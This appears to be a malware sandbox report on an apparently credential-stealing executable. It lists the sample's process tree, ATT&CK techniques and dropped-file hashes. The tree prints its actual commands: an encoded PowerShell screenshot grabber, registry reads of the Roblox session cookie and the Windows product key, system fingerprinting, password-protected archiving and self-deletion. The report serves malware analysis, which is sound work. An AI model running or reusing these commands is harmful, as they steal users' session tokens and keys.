  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4180
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bkbb0c44\bkbb0c44.cmdline"
        5⤵
        
        PID:3792
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8482.tmp" "c:\Users\Admin\AppData\Local\Temp\bkbb0c44\CSC3BA92FE9B7D4D228E8987CAEDEDF197.TMP"
        6⤵
        
        PID:4348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1708
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3520
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1308
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4504
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4960
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4964
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2700
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1552
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:5016
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI8482\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\DIXWM.zip" *"
    3⤵
    PID:3220
  - - C:\Users\Admin\AppData\Local\Temp\_MEI8482\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI8482\rar.exe a -r -hp"blank" "C:\Users\Admin\AppData\Local\Temp\DIXWM.zip" *
      4⤵
      Executes dropped EXE
      PID:4068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:1692
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3792
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1756
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4180
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3944
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2596
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:452
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\EXMPremium.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:5100
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2632

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1732

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:1392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI8482\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\_bz2.pyd

Filesize
48KB

MD5
82e4f19c1e53ee3e46913d4df0550af7

SHA1
283741406ecf64ab64df1d6d46558edd1abe2b03

SHA256
78208da0890aafc68999c94ac52f1d5383ea75364eaf1a006d8b623abe0a6bf0

SHA512
3fd8377d5f365499944a336819684e858534c8a23b8b24882f441318ec305e444e09125a0c0aedc10e31dbf94db60b8e796b03b9e36adbad37ab19c7724f36ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\_ctypes.pyd

Filesize
59KB

MD5
fa360b7044312e7404704e1a485876d2

SHA1
6ea4aad0692c016c6b2284db77d54d6d1fc63490

SHA256
f06c3491438f6685938789c319731ddf64ba1da02cd71f43ab8829af0e3f4e2f

SHA512
db853c338625f3e04b01b049b0cb22bdaed4e785eb43696aeda71b558f0f58113446a96a3e5356607335435ee8c78069ce8c1bcdb580d00fd4baacbec97a4b6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\_decimal.pyd

Filesize
107KB

MD5
b7012443c9c31ffd3aed70fe89aa82a0

SHA1
420511f6515139da1610de088eaaaf39b8aad987

SHA256
3b92d5ca6268a5ad0e92e5e403c621c56b17933def9d8c31e69ab520c30930d9

SHA512
ec422b0bee30fd0675d38888f056c50ca6955788d89c2a6448ddc30539656995627cf548e1b3aa2c4a77f2349b297c466af8942f8133ef4e2dfb706c8c1785e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\_hashlib.pyd

Filesize
35KB

MD5
3a4a3a99a4a4adaf60b9faaf6a3edbda

SHA1
a55ea560accd3b11700e2e2600dc1c6e08341e2f

SHA256
26eed7aac1c142a83a236c5b35523a0922f14d643f6025dc3886398126dae492

SHA512
cb7d298e5e55d2bf999160891d6239afdc15ada83cd90a54fda6060c91a4e402909a4623dcaa9a87990f2af84d6eb8a51e919c45060c5e90511cd4aadb1cdb36

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-console-l1-1-0.dll

Filesize
41KB

MD5
c45ac67ce87993a1eb2150a4e215ccd1

SHA1
cf337047a279001680585e40629fa997ee14eeba

SHA256
002ef1614c26c22c55e9b33b4577fb6a3ed900bc27d5a0025d6d047c64bcf973

SHA512
540c73913ac933061bfb825607f3759a90e7c0be3f04fef801630375f80acf37c92693b0e6ba6e413022cc67e6a17747e43ca0ebb79f4ca89d6fae2b7720cb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-datetime-l1-1-0.dll

Filesize
41KB

MD5
7db195e84b72f05c526a87409f33ee12

SHA1
7027364a274c0f8aba2a2e272fee0c5e1e7c5ded

SHA256
ae2fa471ffb72f41c710a44a05dc6f2715ac83833e653fb611b7681599c95bd5

SHA512
405a0091fed7e9d91d495ead66c00694dcd25a770736fffc05d406e40a810181648b8f420e75641ec173fbe3ef421fbabc36b2392a1b9dbe3ea1a446af95848f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-debug-l1-1-0.dll

Filesize
41KB

MD5
4e82c65e6fac410d119050117d51d88c

SHA1
24e972034996da634fe9a704948f560e03933032

SHA256
4dd548f706fc8b6f72dafd6901454c45b7720d7bad5726bef3c7957f8c0ede8c

SHA512
e024f356ad94dc0b3a1654fe2cfb19a53a4b0fde0cd116d7dd4fba6f4cec60bab8df9447c13c501e75bd202585c296505b865677c77287cf350d4661eb648643

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
41KB

MD5
8821e530975129539a0df5ad9485fe6d

SHA1
aea17422ce8fe1ecb0d0542a0df8e3641a1a107e

SHA256
3686c5f867b56611e3766a1c03b6a0480aa99d6ae515238f004f6a2084758776

SHA512
ddcce5f3f6ce35e128c5b3933ecfccece4975e534e1bea2af04efa63dac9d3e9520eb9b3512955bd7d74c3f749169fb4a7e3ea942e895dd70bdb1a343786ca01

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-fibers-l1-1-0.dll

Filesize
41KB

MD5
fded3e98ae081924dde40f9851967c9c

SHA1
76f3540b40df321216a77268e1d44fa27724e28a

SHA256
8d2e1a7dca9b8c4f6ea8c09bb7db9c729f1c3d16cbbb073f66101fb6f0c30f94

SHA512
64cd2af48b550b43ac424aff7e979f54038b9fcb8e78db777efdd7136efd29a26a3190fcac8d2b0e4a72cab57d6b3b5268240920a8c60b3fc95477e69ffd44f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-fibers-l1-1-1.dll

Filesize
41KB

MD5
46173f3aaeb1830adb3f6cb19bc9fe13

SHA1
5bacc120a80d0ef4722d1489c0563b95f99d1a99

SHA256
affc96d5aa19b374be7a56a859980b56858e22f2a221da8513eec42ffd21a718

SHA512
15f24097564fc57c0f05b1f08043b2789b18a638452018078d262038c407a8ce16658a208c58356ba81146c7a312c054d5b7e9c8d69d19b2cb833500e90c1648

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-file-l1-1-0.dll

Filesize
45KB

MD5
b6381298d05d704ff02fd878ea692f89

SHA1
2ae2466fcf92c19419ac59e841225ef4877374ec

SHA256
26b3ec7f0ef1d09cfaca62c823566b41be9e83606b996ce92339744d96d34a6b

SHA512
6f3ecdd01c9fd3fb722f48d992bce3234d1f17d247c736252e539171cfe2ecf9e6b282beb359f0a68ddf2142371062ad176fb74692a3820d07b81a60215afc8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-file-l1-2-0.dll

Filesize
41KB

MD5
85496fce62c235a881dbe880c2b675a0

SHA1
8358f22d29ce31b9f9a8ec5ad440eb1a55f01433

SHA256
8ae99e14f909b91faa3163fc0f9c2a904de1ee5ebba342d708f747276c9d7ca8

SHA512
d0df9266b21e41a64a096ed0b567a0916d352c7fc9aa7c7ffe819c21a4e3552e79badb88c4829d2580643f86a58e191ad853de1d0e282f16f84a44a741782cc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-file-l2-1-0.dll

Filesize
41KB

MD5
dbc82f123f6888c0efd2aa7bee02707b

SHA1
76c95b72a671830e8590e104448f92180c10006a

SHA256
a5993dc5b4fbc0b2463537666bd0f19b3e9824fc4933490278091877bfd707f0

SHA512
547bb55c8337816494597ec796f75838594d3abd6ac24fe5692b28ef9a5af338dfeba17875854b89a21381bfaf41613e072fb632272547762283cae6474fd8c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-handle-l1-1-0.dll

Filesize
41KB

MD5
bdaa0f3421a238477c2cf269d7dd138a

SHA1
72d57f9901d6d404dd1d44548a395c0d61ff863e

SHA256
f98f0004552417be91b3e15340abe1d1b02d78b45217fb93abe4f9ef6b54d108

SHA512
c2cf66fbdd1533141b537db11a2dfe5b21aa3b82a910d6e444c86ead87293bc77e760f62f70f123e6936cf2bd678786fd24f16fc781c1470b499cb672c4d07c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-heap-l1-1-0.dll

Filesize
41KB

MD5
45cf0dc216451c35c9c1570eee9aab29

SHA1
787aeab05fd1c0ca2dc44ed502a172997c1010a8

SHA256
fdd78958d9dd6287372197954648d433128d581c26b970cb489c59b399441691

SHA512
558559848166a2fbc4ac11a7ded85eb8fba1b8bc3435557bd7de170cd98fc6d3afe2312ae74147d467aace66178cc166a20321a51ebb5de6799023fffc6198d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
41KB

MD5
ddaef501b07a1130bd236ae285ac9055

SHA1
48febee39cd3c741af1e572a1e2a66cffc646149

SHA256
0c957fd8229184147101bd44501495a94a869122fe665fd56e6f2208ffa66a71

SHA512
9cbb1ade3b6e46400cdad04cbd6c345a08d0924c5bc1feb277c5232216b85bea2a7d38f8b8a5f65b4b6757e72f1032e87557c82f1cfaca75dca084e15398d66e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-kernel32-legacy-l1-1-1.dll

Filesize
41KB

MD5
1190c9c96d3d54b0062b2aa07c345e07

SHA1
9da3cb7923d46eab3704e0521700bd645a27d860

SHA256
cd694dd9de1e8f62ddf41952550310c10264f677c153371b3cc3ff8f68280019

SHA512
e2284e713ea1f78bd4ebb08c6eb279ee3b85b404b96bc75fcb2a23d862815e37773edb31d7eb625f688f9d412d16d3388029e3dc53262b29dd5a6fa8c0bd83d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
41KB

MD5
0f5bed8c9c9a292aff1c4cc8065c1925

SHA1
b70fca28a5933514fd8a96c4f9c5185a377b1882

SHA256
bc3634c53e7746777421ade3c332da1218561b4f77da4fe3ce5e8c3ceb9c4b0d

SHA512
4a9f350665b1b46e47ea912e04c32db47552442d739f43b93614c9403951d55b9432a6cc9143674d3ff4e003d428098f0dc06496a9b327be573718edbd9253e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-localization-l1-2-0.dll

Filesize
41KB

MD5
24739ebbf1e51b4106518b09f0d26b38

SHA1
b90e291f502afa76922e01c1eddf0f95626957f6

SHA256
7ac6b6ad7094b606bfb194230ca16b6436bcecd4669a1cfcfd880e25ef3bd106

SHA512
6da9d0aaec46e9f9dd5b0cf865075e88390500bdb7aa04f17c961ff8db8a3f1238812b31aed451583c2e1431f3e447418e745cdbc82beccfb8a004522c1b1d3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-memory-l1-1-0.dll

Filesize
41KB

MD5
9b0dc77df914ae8c848226bd22df2185

SHA1
925af803f125713297bffbd3f005759ac9591b83

SHA256
074bcaf27670e09e3fda81251886e3340c72cc8d2a4deb6e78f9d2f6b8c93a3f

SHA512
978a78fd9fe5b7771db353b0c10bb0d9f05d78964e0b6a7a3e93702c41b324396508d4223b2683ebeb0b6f5a7f080a6f33a4a0d0031b468505fcf28b622510b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
41KB

MD5
e76e0353ee10885c4153f8d5735e62cf

SHA1
cf14fbeda65e5f0b75ad770c53d9af13dc8a4c48

SHA256
f54c36f6cdf0a40ae1ab1772eb27c2e3900e9e21d4f8f2a564a1b3b0326f7dcb

SHA512
ee94cf461aa975f03c046b41ba7d89715f373c78f198a5fe4f918c811781832fadcaac374205da105b9dd76bfd63a15a3073a87b55df5833654537c4bfb971b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
41KB

MD5
fa75c06452ddf3d61913a678be6ec7e2

SHA1
4dc8d6f91cba5396f7a4a7820e5574562cce1b6d

SHA256
b958a3e2f5b42ab500995c9d258278a9ad1f8c3a4986f5a1bf04c5decdc8b29e

SHA512
180bde9a8ec16f1c0fd56b131511b79d297cbfa3ee4c9207f7e675eb8e2a295a2a3df1211e25e12854fd099e27570a12ba90d3ffb00da455b7b1ab2f11b8ee11

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-processthreads-l1-1-0.dll

Filesize
41KB

MD5
2aa1981502b92392e07dc1fbf16b6480

SHA1
9511302223d575a7a108217246ee82dd77b87d30

SHA256
89e233a1b4277f34899e5c4416a9202e3a4fc154c1fb3f56832bb5d90b5e8117

SHA512
005901bf7f9284acb8da987d0b6a5b066966ebcfac1546badd6f4a613287473c0b3d1ef33eacfb270d258c041bbf8303b6068a6adcee2dc6fe6a9e6907c01411

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
41KB

MD5
605d8a1ae34b7ee0b92fb5fbdfaacd8b

SHA1
6f62d615fa91c9707ab03995a690c41cb1a7f34d

SHA256
2aaa351f7d1e423ecfd6db6550b1f7d6ef8c76afe238e8491aa7e4827615edd2

SHA512
ee7ddd2bae12e32ad78625f1a2e7efbd83962cbf1251ee429b3ee3e85170f29fec474489cee57089fe23b60fd5097b44980abaaf4ec542df757e6cad8a55c708

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-profile-l1-1-0.dll

Filesize
41KB

MD5
da5fd555e8136836d33993da6fa23c03

SHA1
02ee3584d0b3dabb0ec36a12e28ea0081a0da3b6

SHA256
6f3b67e02abb67d7fbec15a1415e1858b4900654baa52120e8d887b552b57f2c

SHA512
7425be678d7f829fa110973cee0ad4e6c6d2e3f48a121d5aee5eb619d7e540262320d4b13cfd238c5aa045c9bdcbefe715c4f0fe66e1cb45cde5ecc7c3f8483e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-rtlsupport-l1-1-0.dll

Filesize
41KB

MD5
2e107df701850a43e2baba0427859a9e

SHA1
4dac4434b88420a9a67efe4e9b19d877526d7310

SHA256
7e7950b535768988313ae1689be3844f471293e293cec4be845e17c1e8940623

SHA512
369a6133373a1e0a11f807946e32b56b310755d55560004803677dd9b107f401ea9bd9de1f4a93e50e9152f5191b6a5ff36bc78901f070752e28b1b769057c0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-string-l1-1-0.dll

Filesize
41KB

MD5
698704e1735825ed67348bcd561bc5df

SHA1
7b6c821a3ddf9488e1a4126a54c5fda2155ded5c

SHA256
dce5934af79f7f22d5bd58a9fa6fcf4734ef13ca3b58a26579a6d7471e6b27e5

SHA512
27a392b95ddb368dddce19287b8da5be7f860afeb15a5735d324265b77cdcf78dc6dc33555572f13c0a4e540b8bf900bd3552a183643772708b928b4204f3e35

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-synch-l1-1-0.dll

Filesize
41KB

MD5
acb35f65f19e48bc685c06efaa692e26

SHA1
5a48a3d685c829fbb22281e245abbf2742398c82

SHA256
590d924e988503e023848ebdc3f3f01bfcc4e3f7717816c5a68b8f8414ab41f9

SHA512
3bb3ef453916825f675c245424bf18a847a0990398d1fbd349fe3e265aa1aa7c1bf90eedc447bf7de2eda95ed6fb2f8e4e79e3f0222536097afc0e629c5bb42a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI8482\api-ms-win-core-synch-l1-2-0.dll

Filesize
41KB

MD5
3edf358d26f05f473dc894d6868446a5

SHA1
1d78885a66e177a94c1af8daa35bcac4e8724f24

SHA256
6e5a3ddfdc21561c0f4e8ef77a4df9f19b1bf9212c91de92946f230e8a6ec91b

SHA512
